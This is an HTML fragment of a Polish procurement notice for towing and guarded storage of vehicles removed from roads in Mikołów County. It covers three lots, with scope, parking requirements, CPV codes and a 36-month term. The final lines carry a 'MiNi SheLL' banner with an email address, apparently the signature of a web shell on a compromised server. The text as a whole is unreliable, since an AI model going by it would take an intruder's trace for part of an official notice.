a) przyjęcie zlecenia przyjazdu pojazdu holującego, 
b )dojazd do miejsca wskazanego w dyspozycji oraz podjęcie czynności usunięcia z drogi pojazdu w czasie nie dłuższym niż 30 minut od chwili otrzymania dyspozycji;
c) przygotowanie pojazdu lub pojazdów i jego elementów do załadunku (wszelkie prace
towarzyszące przygotowaniu pojazdu do transportu), 
d)załadunek pojazdu (części pojazdu) na zestaw holujący, 
e)dojazd z pojazdem transportowanym na wskazany parking, 
f) rozładunek i zaparkowanie pojazdu na parkingu, 
g)uporządkowanie miejsca zdarzenia z odpadków szkła, metalu i innych części pojazdu lub jego
ładunku nie wymagających użycia specjalistycznego sprzętu znajdującego się w pojazdach do
tego przeznaczonych;
3) Czynności związane z odstąpieniem od wykonania dyspozycji usunięcia pojazdu z drogi, która obejmuje:
a) dojazd do miejsca wskazanego w dyspozycji i odstąpienie od jej wykonania bez podjęcia czynności załadunku;
b) dojazd do miejsca wskazanego w dyspozycji , rozpoczęcie czynności załadunkowych i następnie odstąpienie od wykonania dyspozycji;
4) Wykonawca będzie zobowiązany do realizacji każdego zlecenia usunięcia pojazdu z drogi na wniosek osób do tego upoważnionych zgodnie z art. 130a ust. 4 ustawy-Prawo o ruchu drogowym. 
( dyspozycyjność przez 24 godziny/dobę przez 7 dni w tygodniu).
5) Usługę należy wykonać za pomocą sprzętu specjalistycznego, odpowiednio oznakowanego, w odpowiedniej ilości umożliwiającej sprawne i ciągłe usuwanie pojazdów z miejsc zlokalizowanych na terenie Powiatu Mikołowskiego w możliwie jak najkrótszym czasie.

Szacunkowy zakres zamówienia dla zadania I zawiera załącznik nr 2 do SIWZ -  Kalkulacja cenowa przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie kompleksowych usług w zakresie całodobowego przechowywania na parkingu strzeżonym pojazdów usuniętych z drogi w przypadkach określonych w art. 130a ust. 1 i 2 ustawy z dnia 20 czerwca 1997r.-Prawo o ruchu drogowym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie kompleksowych usług w zakresie całodobowego przechowywania na parkingu strzeżonym pojazdów usuniętych z drogi w przypadkach określonych w art. 130a ust. 1 i 2 ustawy z dnia 20 czerwca 1997r.-Prawo o ruchu drogowym.
Zadanie obejmuje następujący zakres: 
a) Przyjęcie pojazdu na parkingu i jego odpowiednie zabezpieczenia przed zniszczeniem w czasie jego przechowywania, w szczególności pojazdów z uszkodzeniami powypadkowymi;
b) Sprawowanie całodobowego nadzoru nad przyjętym pojazdem do momentu jego odbioru przez osobę wskazaną w zezwoleniu lub do ostatecznego zbycia albo zniszczenia pojazdu przez Zamawiającego.
c) Wydanie pojazdu osobie uprawnionej na podstawie zezwolenia wystawionego przez podmiot do tego upoważniony, po okazaniu dowodu uiszczenia opłaty za usunięcie pojazdu oraz jego przechowywanie na parkingu strzeżonym;
d) Informowanie Zamawiającego oraz podmiotu wydającego dyspozycję usunięcia, o fakcie nieodebrania pojazdu z parkingu po upływie 3 miesięcy od momentu jego usunięcia, jednak nie później niż 3-go dnia od upływu tego terminu, zgodnie z art. 130a ust. 10 i 10g ustawy-Prawo o ruchu drogowym;
3) Parking strzeżony na którym będą przechowywane pojazdy usunięte z drogi musi spełniać następujące  minimalne parametry : 
-nieruchomość utwardzona ( asfalt,beton, kostka ), 
-trwale ogrodzony (siatka, parkan), 
- oświetlony, 
- dozorowany przez całą dobę ( monitoring elektroniczny lub ochrona fizyczna), 
- wyposażony w sprzęt przeciwpożarowy, 
- zamykany w sposób uniemożliwiający wjazd i wyjazd środka transportu bez zezwolenia osoby dozorującej, 
- umożliwiający przechowywanie wszystkich sukcesywnie usuwanych na mocy art. 130a ust. 1 i 2 ustawy - Prawo o ruchu drogowym ,z dróg powiatu mikołowskiego pojazdów, tj.: rowerów , motorowerów, motocykli, pojazdów o dopuszczalnej masie całkowitej do 3,5 t, pojazdów o dopuszczalnej masie całkowitej od 3,5 t do 7,5 t, pojazdów o dopuszczalnej masie całkowitej od 7,5 t do 16 t, pojazdów o dopuszczalnej masie całkowitej powyżej 16 t, 
-  oznakowany tablicą informacyjną 
-  posiadający  łącznie następującą liczbę miejsc do parkowania 
pojazdów:
a) o dmc do 3,5 t- minimum 25 miejsc;
b) o dmc powyżej 3,5 tony - minimum 6 miejsc;

Szacunkowy zakres zamówienia dla zadania II zawiera załącznik nr 3 do SIWZ -  Kalkulacja cenowa przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.35.11.00-9, 63.71.24.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie kompleksowych usług w zakresie całodobowego przechowywania na parkingu strzeżonym pojazdów przewożących materiały niebezpieczne, usuniętych z drogi w przypadkach określonych w art. 130a ust. 1 i 2 ustawy z dnia 20 czerwca 1997r.-Prawo o ruchu drogowym..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie kompleksowych usług w zakresie całodobowego przechowywania na parkingu strzeżonym pojazdów przewożących materiały niebezpieczne, usuniętych z drogi w przypadkach określonych w art. 130a ust. 1 i 2 ustawy z dnia 20 czerwca 1997r.-Prawo o ruchu drogowym.
Zadanie obejmuje następujący zakres:
a) Przyjęcie pojazdu na parkingu i jego odpowiednie zabezpieczenia przed zniszczeniem w czasie jego przechowywania, w szczególności pojazdów z uszkodzeniami powypadkowymi;
b) Sprawowanie całodobowego nadzoru nad przyjętym pojazdem do momentu jego odbioru przez osobę wskazaną w zezwoleniu lub do ostatecznego zbycia pojazdu przez Zamawiającego.
c) Wydanie pojazdu osobie uprawnionej na podstawie zezwolenia wystawionego przez podmiot do tego upoważniony, po okazaniu dowodu uiszczenia opłaty za usunięcie pojazdu oraz jego przechowywanie na parkingu strzeżonym;
d) Informowanie Zamawiającego oraz podmiotu wydającego dyspozycję usunięcia, o fakcie nieodebrania pojazdu z parkingu po upływie 3 miesięcy od momentu jego usunięcia, jednak nie później niż 3-go dnia od upływu tego terminu, zgodnie z art. 130a ust. 10 i 10g ustawy-Prawo o ruchu drogowym;
e) Parking strzeżony na którym będą przechowywane pojazdy przewożące materiały niebezpieczne musi spełniać warunki techniczne określone przez  rozporządzenie Ministra Spraw Wewnętrznych z dnia 13 listopada 2012r. w sprawie warunków technicznych parkingów, na które są usuwane pojazdy przewożące towary niebezpieczne (Dz. U. z dnia 23 listopada 2012r. poz. 1293 )- treść rozporządzenia stanowi załącznik nr 4 do SIWZ.
Szacunkowy zakres zamówienia dla zadania III zawiera załącznik nr 3a do SIWZ -  Kalkulacja cenowa przedmiotu zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.35.11.00-9, 63.71.24.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com